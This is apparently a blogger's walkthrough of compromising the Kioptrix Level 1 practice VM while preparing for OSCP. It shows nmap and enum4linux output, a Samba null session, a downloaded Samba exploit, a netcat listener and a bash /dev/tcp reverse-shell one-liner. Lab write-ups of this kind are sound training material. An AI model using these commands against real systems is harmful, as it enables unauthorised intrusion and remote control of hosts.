I have 26 more days to prepare for OSCP.
I used netdiscover to find the IP of the vulnerable box.
netdiscover -i eth0
After getting the IP I ran NMAP to check the open ports and running services.
nmap -p- -sV -sS -T4 -A -oX Kioptrixlvl1.xml
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 06:57 EDT
Nmap scan report for
Host is up (0.00052s latency).
Not shown: 65529 closed ports
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1026/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: kMYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_ssl-date: 2017-05-16T11:00:24+00:00; +1m50s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:D2:DB:A4 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 – 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: mean: 1m50s, deviation: 0s, median: 1m50s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
1 0.52 ms
Post-scan script results:
| clock-skew:
|_ 1m50s: Majority of systems scanned
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.12 seconds
I tried to connect to SSH but it requires me a password
For the Apache port 80 and 443 I ran a dirbuster to check for hidden directories or pages
NMAP detected port 139 running on Samba.
I ran nbtscan.
I tried to login using rpcclient and discovered that I can login using null session.
I also used enum4linux to get more details about it.
========================== | Target Information |
Target ………..
RID Range …….. 500-550,1000-1050
Username ……… ”
Password ……… ”
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
| Enumerating Workgroup/Domain on |
[+] Got domain/workgroup name: MYGROUP
| Nbtstat Information for |
Looking up status of
KIOPTRIX <00> – B <ACTIVE> Workstation Service
KIOPTRIX <03> – B <ACTIVE> Messenger Service
KIOPTRIX <20> – B <ACTIVE> File Server Service
..__MSBROWSE__. <01> – <GROUP> B <ACTIVE> Master Browser
MYGROUP <00> – <GROUP> B <ACTIVE> Domain/Workgroup Name
MYGROUP <1d> – B <ACTIVE> Master Browser
MYGROUP <1e> – <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
| Session Check on |
[+] Server allows sessions using username ”, password ”
| Getting domain SID for |
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup
| OS information on |
[+] Got OS info for from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03
| Users on |
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
| Share Enumeration on |
WARNING: The “syslog” option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Sharename Type Comment
——— —- ——-
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Server Comment
——— ——-
KIOPTRIX Samba Server
Workgroup Master
——— ——-
[+] Attempting to map shares on
//$ [E] Can’t understand response:
WARNING: The “syslog” option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
//$ [E] Can’t understand response:
WARNING: The “syslog” option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
tree connect failed: NT_STATUS_WRONG_PASSWORD
| Password Policy Information for |
[E] Unexpected error from polenum:
[+] Attaching to using a NULL share
[+] Trying protocol 445/SMB…
[!] Protocol failed: [Errno 111] Connection refused (
[+] Trying protocol 139/SMB…
[!] Protocol failed: (‘unpack requires a string argument of length 4’, “When unpacking field ‘representation | <L=0x10 | ‘\\x00′[:4]'”)
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
| Groups on |
[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Power Users] rid:[0x223]
group:[Account Operators] rid:[0x224]
group:[System Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
[+] Getting builtin group memberships:
Group ‘Print Operators’ (RID: 550) has member: Couldn’t find group Print Operators
Group ‘Replicator’ (RID: 552) has member: Couldn’t find group Replicator
Group ‘Account Operators’ (RID: 548) has member: Couldn’t find group Account Operators
Group ‘Power Users’ (RID: 547) has member: Couldn’t find group Power Users
Group ‘Guests’ (RID: 546) has member: Couldn’t find group Guests
Group ‘Administrators’ (RID: 544) has member: Couldn’t find group Administrators
Group ‘Backup Operators’ (RID: 551) has member: Couldn’t find group Backup Operators
Group ‘Users’ (RID: 545) has member: Couldn’t find group Users
Group ‘System Operators’ (RID: 549) has member: Couldn’t find group System Operators
[+] Getting local groups:
group:[sys] rid:[0x3ef]
group:[tty] rid:[0x3f3]
group:[disk] rid:[0x3f5]
group:[mem] rid:[0x3f9]
group:[kmem] rid:[0x3fb]
group:[wheel] rid:[0x3fd]
group:[man] rid:[0x407]
group:[dip] rid:[0x439]
group:[lock] rid:[0x455]
group:[users] rid:[0x4b1]
group:[slocate] rid:[0x413]
group:[floppy] rid:[0x40f]
group:[utmp] rid:[0x415]
[+] Getting local group memberships:
[+] Getting domain groups:
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
[+] Getting domain group memberships:
Group ‘Domain Users’ (RID: 513) has member: Couldn’t find group Domain Users
Group ‘Domain Admins’ (RID: 512) has member: Couldn’t find group Domain Admins
| Users on via RID cycling (RIDS: 500-550,1000-1050) |
[I] Found new SID: S-1-5-21-4157223341-3243572438-1405127623
[+] Enumerating users using SID S-1-5-21-4157223341-3243572438-1405127623 and logon username ”, password ”
S-1-5-21-4157223341-3243572438-1405127623-500 KIOPTRIX\
S-1-5-21-4157223341-3243572438-1405127623-501 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-502 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-503 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-504 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-505 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-506 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-507 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-508 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-509 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-510 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-511 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-512 KIOPTRIX\Domain Admins (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-513 KIOPTRIX\Domain Users (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-514 KIOPTRIX\Domain Guests (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-515 KIOPTRIX\unix_group.2147483405 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-516 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-517 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-518 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-519 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-520 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-521 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-522 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-523 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-524 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-525 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-526 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-527 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-528 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-529 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-530 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-531 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-532 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-533 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-534 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-535 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-536 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-537 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-538 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-539 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-540 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-541 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-542 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-543 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-544 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-545 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-546 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-547 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-548 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-549 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-550 KIOPTRIX\unix_group.2147483423 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1000 KIOPTRIX\root (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1001 KIOPTRIX\root (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1002 KIOPTRIX\bin (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1003 KIOPTRIX\bin (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1004 KIOPTRIX\daemon (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1005 KIOPTRIX\daemon (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1006 KIOPTRIX\adm (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1007 KIOPTRIX\sys (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1008 KIOPTRIX\lp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1009 KIOPTRIX\adm (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1010 KIOPTRIX\sync (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1011 KIOPTRIX\tty (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1012 KIOPTRIX\shutdown (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1013 KIOPTRIX\disk (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1014 KIOPTRIX\halt (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1015 KIOPTRIX\lp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1016 KIOPTRIX\mail (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1017 KIOPTRIX\mem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1018 KIOPTRIX\news (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1019 KIOPTRIX\kmem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1020 KIOPTRIX\uucp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1021 KIOPTRIX\wheel (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1022 KIOPTRIX\operator (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1023 KIOPTRIX\unix_group.11 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1024 KIOPTRIX\games (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1025 KIOPTRIX\mail (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1026 KIOPTRIX\gopher (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1027 KIOPTRIX\news (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1028 KIOPTRIX\ftp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1029 KIOPTRIX\uucp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1030 KIOPTRIX\unix_user.15 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1031 KIOPTRIX\man (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1032 KIOPTRIX\unix_user.16 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1033 KIOPTRIX\unix_group.16 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1034 KIOPTRIX\unix_user.17 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1035 KIOPTRIX\unix_group.17 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1036 KIOPTRIX\unix_user.18 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1037 KIOPTRIX\unix_group.18 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1038 KIOPTRIX\unix_user.19 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1039 KIOPTRIX\floppy (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1040 KIOPTRIX\unix_user.20 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1041 KIOPTRIX\games (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1042 KIOPTRIX\unix_user.21 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1043 KIOPTRIX\slocate (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1044 KIOPTRIX\unix_user.22 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1045 KIOPTRIX\utmp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1046 KIOPTRIX\squid (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1047 KIOPTRIX\squid (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1048 KIOPTRIX\unix_user.24 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1049 KIOPTRIX\unix_group.24 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1050 KIOPTRIX\unix_user.25 (Local User)
| Getting printer info for |
No printers returned.
enum4linux complete on Tue May 16 07:48:13 2017
I googled Samba 2.2.1a and found an exploit.
I downloaded the exploit using wget.
Then I checked the file if it needs editing.
Compile and run it.
I started a netcat listener at port 4444.
nc -nlvp 4444
Then use this command to connect back to our attacking box.
bash -i >& /dev/tcp/ 0>&1
Whats was the error which got on that C file
Sorry I don’t get it. What error?
you said that you needed some editing in the exploit file I was referring to that
Oh! I just checked the exploit code if it needs some editing like hardcoded Target Ip address and ports. The exploit code is fine. Sorry if I confused you. Thank you!